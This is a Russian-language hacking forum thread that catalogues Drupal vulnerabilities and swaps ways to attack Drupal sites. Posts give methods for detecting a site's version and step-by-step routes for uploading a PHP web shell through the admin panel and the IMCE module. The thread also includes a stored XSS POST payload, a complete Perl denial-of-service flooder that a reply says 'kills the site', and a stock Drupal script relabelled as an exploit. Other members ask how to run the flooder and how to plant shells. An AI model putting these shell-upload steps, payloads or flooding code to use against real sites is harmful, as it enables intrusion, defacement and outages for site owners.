[ Обзор Уязвимостей .:Drupal :. ]

Discussion in 'Веб-уязвимости' started by Cawabunga, 23 Feb 2008.

  1. Cawabunga

    Cawabunga Elder - Старейшина

    Joined:
    16 Apr 2007
    Messages:
    359
    Likes Received:
    165
    Reputations:
    -22
    Обзор уязвимостей Drupal


    Drupal < 4.7.6 (post comments) Remote Command Execution Exploit v2

    Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

    Drupal Cross-Site Request Forgery Vulnerability (Vulnerabilities)

    Drupal Prior To 4.7.11 and 5.6 Multiple Remote Vulnerabilities (Vulnerabilities)

    Drupal Prior To 4.7.8 and 5.3 Multiple Remote Vulnerabilities (Vulnerabilities)

    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

    Drupal Content Construction Kit Nodereference Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)

    [Injection]
    Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)

    Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)
     
    #1 Cawabunga, 23 Feb 2008
    Last edited by a moderator: 22 May 2008
    1 person likes this.
    1. Muhacir

      Muhacir Elder - Старейшина

      Joined:
      5 Oct 2006
      Messages:
      91
      Likes Received:
      51
      Reputations:
      -2
      узнаем версию
      http://path/CHANGELOG.txt
       
      1. Elekt

        Elekt Banned

        Joined:
        5 Dec 2005
        Messages:
        944
        Likes Received:
        427
        Reputations:
        508

        отсортировано по убыванию по дате

        ===================
        HIGH

        Drupal Meta Tags Module command execution

        Обход ограничений безопасности в Drupal
        Удаленный пользователь может изменить данные профиля других пользователей.

        Drupal Site_Documentation_Module CVE-2008-2271

        Drupal Comment Upload Module

        ===================
        SQL-inj

        SQL-инъекция в Drupal

        SQL-инъекция в vbDrupal

        SQL-инъекция в Drupal Acidfree Module

        SQL-инъекция в Drupal Extended Tracker

        SQL-инъекция в Drupal Easylinks

        SQL-инъекция в Drupal Bibliography

        SQL-инъекция в Drupal Jobsearch

        SQL-инъекция и раскрытии е данных в Drupal

        ===================
        Multy

        Множественные уязвимости в vbDrupal

        Множественные уязвимости в Drupal

        Множественные уязвимости в Drupal

        Множественные уязвимости в Drupal

        Множественные уязвимости в Drupal

        Несколько уязвимостей в Drupal

        Несколько уязвимостей в Drupal Help Tip

        Несколько уязвимостей в Drupal IMCE

        ===================
        CSRF

        CSRF атака в Drupal Userpoints Module

        CSRF атака в Drupal BUEditor Module

        ===================
        XSS

        XSS Drupal Internationalization and Localizer

        XSS Drupal E-Publish Module

        XSS Drupal Ubercart Module

        XSS Drupal Webform Module

        XSS Drupal Flickr Module

        XSS Multiple Time Sheets

        XSS Drupal

        XSS Drupal Workflow Module

        XSS Drupal Archive Module

        XSS Drupal Shoutbox Module

        XSS Drupal Token

        XSS Drupal Web Links

        XSS Drupal Project Issue Tracking Module

        XSS Drupal

        XSS Drupal LoginToboggan Module

        XSS Drupal Project Module

        XSS Drupal MySite Module

        XSS Drupal Site Profile Directory

        XSS Drupal Search Keywords

        XSS Drupal Pathauto

        XSS Drupal E-commerce

        XSS Drupal Easylinks

        XSS Drupal Bibliography

        XSS Drupal Recipe Module

        XSS Drupal

        XSS Drupal webform Module

        XSS Drupal

        XSS Drupal

        ===================
        Module

        Drupal Simple Access Module

        Drupal Header Image Module
        Уязвимость позволяеть получить доступ к административной части приложения.

        Drupal Secure Site Module
        Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя.

        Drupal OpenID Module
        Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку.

        Drupal Forward Module
        Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении.

        Drupal Print Module
        Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям.

        Drupal Project Issue Tracking Module
        Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные.

        Drupal Nodefamily Module
        Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL.

        Drupal Textimage Module
        Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе.

        Drupal Captcha Module
        Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha.

        Drupal Pubcookie Module
        Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации.

        Drupal Form_mail Module
        Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение.

         
        #3 Elekt, 22 May 2008
        Last edited: 22 May 2008
        1. kirufka

          kirufka New Member

          Joined:
          18 Aug 2008
          Messages:
          7
          Likes Received:
          0
          Reputations:
          0
          вот так версию узнать можно:
          Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка:
          define('VERSION', 'ТУТ ВЕРСИЯ');
          Если строчки нет, то версия ниже 4.7.0
          Дополню пост:
          в некоторых модулях написана версия, к примеру:
          site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё.
          З.Ы. почему бы не прикрепить тему, тоже нужная вещь
           
          #4 kirufka, 1 Dec 2008
          Last edited: 1 Dec 2008
          1. Pashkela

            Pashkela Динозавр

            Joined:
            10 Jan 2008
            Messages:
            2,750
            Likes Received:
            1,044
            Reputations:
            339
            Drupal 6.14 - заливка шелла из админпанели

            1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration

            2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных

            3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published)

            4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt)

            5) http://drupal.ru/sites/default/files/shell.php3 - шелл

            6) Administer->Content management->Удаляем страницу
             
            3 people like this.
            1. zerg

              zerg Elder - Старейшина

              Joined:
              5 Mar 2006
              Messages:
              42
              Likes Received:
              6
              Reputations:
              0
              мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
              Code:
              # $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
               
              1. pinky07

                pinky07 Member

                Joined:
                2 Jan 2009
                Messages:
                55
                Likes Received:
                34
                Reputations:
                6
                ещё один способ загрузки шела

                ещё один способ загрузки шела:
                Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php
                Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп
                 
                1 person likes this.
                1. OxoTnik

                  OxoTnik На мышей

                  Joined:
                  10 Jun 2011
                  Messages:
                  943
                  Likes Received:
                  525
                  Reputations:
                  173
                  Drupal 7.0 Shell Execution Script

                  PHP:
                  #!/usr/bin/env php
                  <?php
                   
                  /**
                   * Drupal 7.0 Shell Execution Script
                   * ================
                   * By KedAns-Dz <[email protected]>
                   * ================
                   * (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh 
                   * The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts
                   * ================
                   * ------------------------
                   * Check for your PHP interpreter - on Windows you'll probably have to
                   * replace line 1 with : 
                   * #!c:/program files/php/php.exe
                   * @param path  Drupal's absolute root directory in local file system (optional).
                   * @param URI   A URI to execute, including HTTP protocol prefix.
                   */
                  $script basename(array_shift($_SERVER['argv']));
                   
                  if (
                  in_array('--help'$_SERVER['argv']) || empty($_SERVER['argv'])) {
                    echo <<<EOF
                   
                  Execute a Drupal page from the shell.
                   
                  Usage:        
                  {$script} [OPTIONS] "<URI>"
                  Example:      
                  {$script} "http://target.org/node"
                   
                  All arguments are long options.
                   
                    --help      This page.
                   
                    --root      Set the working directory for the script to the specified path.
                                To execute Drupal this has to be the root directory of your
                                Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
                                running on Unix). Current directory is not required.
                                Use surrounding quotation marks on Windows.
                   
                    --verbose   This option displays the options as they are set, but will
                                produce errors from setting the session.
                   
                    URI         The URI to execute, i.e. http://default/foo/bar for executing
                                the path '/foo/bar' in your site 'default'. URI has to be
                                enclosed by quotation marks if there are ampersands in it
                                (f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,
                                and the domain must exist in Drupal's sites-directory.
                   
                                If the given path and file exists it will be executed directly,
                                i.e. if URI is set to http://default/bar/foo.php
                                and bar/foo.php exists, this script will be executed without
                                bootstrapping Drupal. To execute Drupal's cron.php, specify
                                http://default/cron.php as the URI.
                   
                   
                  To run this script without --root argument invoke it from the root directory
                  of your Drupal installation with
                   
                    ./scripts/
                  {$script}
                  n
                  EOF;
                    exit;
                  }
                   
                  // define default settings
                  $cmd 'index.php';
                  $_SERVER['HTTP_HOST']       = 'default';
                  $_SERVER['PHP_SELF']        = '/index.php';
                  $_SERVER['REMOTE_ADDR']     = '127.0.0.1';
                  $_SERVER['SERVER_SOFTWARE'] = NULL;
                  $_SERVER['REQUEST_METHOD']  = 'GET';
                  $_SERVER['QUERY_STRING']    = '';
                  $_SERVER['PHP_SELF']        = $_SERVER['REQUEST_URI'] = '/';
                  $_SERVER['HTTP_USER_AGENT'] = 'console';
                   
                  // toggle verbose mode
                  if (in_array('--verbose'$_SERVER['argv'])) {
                    
                  $_verbose_mode true;
                  }
                  else {
                    
                  $_verbose_mode false;
                  }
                   
                  // parse invocation arguments
                  while ($param array_shift($_SERVER['argv'])) {
                    switch (
                  $param) {
                      case 
                  '--root':
                        
                  // change working directory
                        
                  $path array_shift($_SERVER['argv']);
                        if (
                  is_dir($path)) {
                          
                  chdir($path);
                          if (
                  $_verbose_mode) {
                            echo 
                  "cwd changed to: {$path}n";
                          }
                        }
                        else {
                          echo 
                  "nERROR: {$path} not found.nn";
                        }
                        break;
                   
                      default:
                        if (
                  substr($param02) == '--') {
                          
                  // ignore unknown options
                          
                  break;
                        }
                        else {
                          
                  // parse the URI
                          
                  $path parse_url($param);
                   
                          
                  // set site name
                          
                  if (isset($path['host'])) {
                            
                  $_SERVER['HTTP_HOST'] = $path['host'];
                          }
                   
                          
                  // set query string
                          
                  if (isset($path['query'])) {
                            
                  $_SERVER['QUERY_STRING'] = $path['query'];
                            
                  parse_str($path['query'], $_GET);
                            
                  $_REQUEST $_GET;
                          }
                   
                          
                  // set file to execute or Drupal path (clean urls enabled)
                          
                  if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
                            
                  $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $path['path'];
                            
                  $cmd substr($path['path'], 1);
                          }
                          elseif (isset(
                  $path['path'])) {
                            if (!isset(
                  $_GET['q'])) {
                              
                  $_REQUEST['q'] = $_GET['q'] = $path['path'];
                            }
                          }
                   
                          
                  // display setup in verbose mode
                          
                  if ($_verbose_mode) {
                            echo 
                  "Hostname set to: {$_SERVER['HTTP_HOST']}n";
                            echo 
                  "Script name set to: {$cmd}n";
                            echo 
                  "Path set to: {$_GET['q']}n";
                          }
                        }
                        break;
                    }
                  }
                   
                  if (
                  file_exists($cmd)) {
                    include 
                  $cmd;
                  }
                  else {
                    echo 
                  "nERROR: {$cmd} not found.nn";
                  }
                  exit();
                  /***============================================================================================
                  ***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
                  * Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
                  * Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
                  * Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
                  * Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)
                  * Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
                  * Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
                  * Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
                  * 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com 
                  * www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
                  *================================================================================================
                  */
                  4символа
                   
                  1. mr.Penguin

                    mr.Penguin Member

                    Joined:
                    8 Mar 2012
                    Messages:
                    40
                    Likes Received:
                    37
                    Reputations:
                    74
                    Drupal 5.x, возможно более ранние версии.
                    Уязвим параметр profile_big, field_location[0][city].

                    POST:
                    Code:
                    www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=<script>alert('XSS by mr.Penguin')</script>&op=Сохранить
                    Далее нажмите на "Просмотр" и активная XSS выполнится :)

                    Скриншоты:
                    [​IMG] [​IMG]
                     
                    #9 mr.Penguin, 27 Mar 2012
                    Last edited: 27 Mar 2012
                    1 person likes this.
                    1. Ice_Burn

                      Ice_Burn Member

                      Joined:
                      10 Feb 2009
                      Messages:
                      217
                      Likes Received:
                      26
                      Reputations:
                      1
                      Drupal 0-day Отказ в обслуживании

                      PHP:
                      1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
                      0     _                   __           __       __                     1
                      1   
                      /' \            __  /'__`\        /\ \__  /'__`\                   0
                      0  
                      /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
                      1  
                      \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
                      0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
                      1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
                      0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
                      1                  \ \____/ >> Exploit database separated by exploit   0
                      0                   \/___/          type (local, remote, DoS, etc.)    1
                      1                                                                      1
                      0  [+] Site            : 1337day.com                                   0
                      1  [+] Support e-mail  : submit[at]1337day.com                         1
                      0                                                                      0
                      1               #########################################              1
                      0               I'm Angel Injection member from Inj3ct0r Team          1
                      1               #########################################              0
                      0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
                      [+] title: Drupal 0-day Denial Of Service
                      [-] author: Angel Injection
                      [-] Security -::RISK: high

                      ---------perl code----------------

                      #!/usr/bin/perl
                      use Socket;
                      if (@ARGV < 2) { &usage }
                      $rand=rand(10);
                      $host = $ARGV[0];
                      $dir = $ARGV[1];
                      $host =~ s/(http:\/\/)//eg;
                      for (
                      $i=0; $i<10; $i--)
                      {
                      $user="Drupal".$rand.$i;
                      $data = "s="
                      ;
                      $len = length $data;
                      $foo = "POST ".$dir."index.php HTTP/1.1\r\n".
                      "Accept: */*\r\n".
                      "Accept-Language: en-gb\r\n".
                      "Content-Type: application/x-www-form-urlencoded\r\n".
                      "Accept-Encoding: gzip, deflate\r\n".
                      "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
                      "Host: 
                      $host\r\n".
                      "Content-Length: 
                      $len\r\n".
                      "Connection: Keep-Alive\r\n".
                      "Cache-Control: no-cache\r\n\r\n".
                      "
                      $data";
                      my 
                      $port = "80";
                      my 
                      $proto = getprotobyname('tcp');
                      socket(SOCKET, PF_INET, SOCK_STREAM, 
                      $proto);
                      connect(SOCKET, sockaddr_in(
                      $port, inet_aton($host))) || redo;
                      send(SOCKET,"
                      $foo", 0);
                      syswrite STDOUT, "+" ;
                      }
                      print "\n\n";
                      system('ping 
                      $host');
                      sub usage {
                      print "\t$0 <host> </dir/>\n";
                      print "\tex: $0 127.0.0.1 /Drupal/\n";
                      print "\tex2: $0 127.0.0.1 /\n\n";
                      exit();
                      };


                      # 1337day.com [2012-05-05]
                      Линк: 1337day.com/exploits/18201
                       
                      1 person likes this.
                      1. -loony-

                        -loony- New Member

                        Joined:
                        15 Jun 2012
                        Messages:
                        1
                        Likes Received:
                        0
                        Reputations:
                        0
                        А как работать с этим скриптом и какой принцип его действия? Будьте так добры, поясните, пожалуйста. Интерпретатор стоит, запуск из командной строки, так? В нем что-то нужно дописывать?
                         
                        1. Ereee

                          Ereee Elder - Старейшина

                          Joined:
                          1 Dec 2011
                          Messages:
                          560
                          Likes Received:
                          370
                          Reputations:
                          267
                          Denial of Service. Убивает сайт.
                           
                          1. DyukiN

                            DyukiN Banned

                            Joined:
                            10 Jul 2011
                            Messages:
                            253
                            Likes Received:
                            46
                            Reputations:
                            21
                            есть ли какая нибудь уязвимость в версии 6.24?
                             
                            1. MrCepbIu

                              MrCepbIu Banned

                              Joined:
                              24 Feb 2010
                              Messages:
                              42
                              Likes Received:
                              3
                              Reputations:
                              1
                              http://forum.antichat.ru/showpost.php?p=3020365&postcount=8
                              не понял, что он делает? как работает? и ещё не запускается
                              Code:
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              #!/usr/bin/php
                              PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 19456 bytes) in /tmp/index.php on line 80
                              и попутный вопрос, нет ни чего на 6.22?
                               
                              #14 MrCepbIu, 13 Sep 2012
                              Last edited: 13 Sep 2012
                              1. DyukiN

                                DyukiN Banned

                                Joined:
                                10 Jul 2011
                                Messages:
                                253
                                Likes Received:
                                46
                                Reputations:
                                21
                                какие способы есть заливки шелла?
                                 
                                1. ReV0LVeR

                                  ReV0LVeR Banned

                                  Joined:
                                  3 May 2011
                                  Messages:
                                  30
                                  Likes Received:
                                  5
                                  Reputations:
                                  1
                                  а в чем проблема? редактор страниц потдерживает php.
                                   
                                  1. tripwired

                                    tripwired New Member

                                    Joined:
                                    13 Nov 2012
                                    Messages:
                                    7
                                    Likes Received:
                                    0
                                    Reputations:
                                    0
                                    надо попробовать

                                    [​IMG]
                                     
                                    1. ZeR0ChanNeL

                                      ZeR0ChanNeL Banned

                                      Joined:
                                      1 Jan 2013
                                      Messages:
                                      55
                                      Likes Received:
                                      2
                                      Reputations:
                                      0
                                      drupal 7.15,раскрытие путей
                                       
                                      1. justonline

                                        justonline network ninja

                                        Joined:
                                        27 Jul 2011
                                        Messages:
                                        499
                                        Likes Received:
                                        60
                                        Reputations:
                                        53
                                        Что в бд drupal 6,28 отвечает за ретрив пароля? Пишется там куда-нибудь хеш или как? Движок пока скачать не могу(
                                         
                                        1. studioz

                                          studioz New Member

                                          Joined:
                                          24 Feb 2013
                                          Messages:
                                          0
                                          Likes Received:
                                          0
                                          Reputations:
                                          0
                                          Drupal 7.22 тоже работает, похоже на всю 7 ветку действует.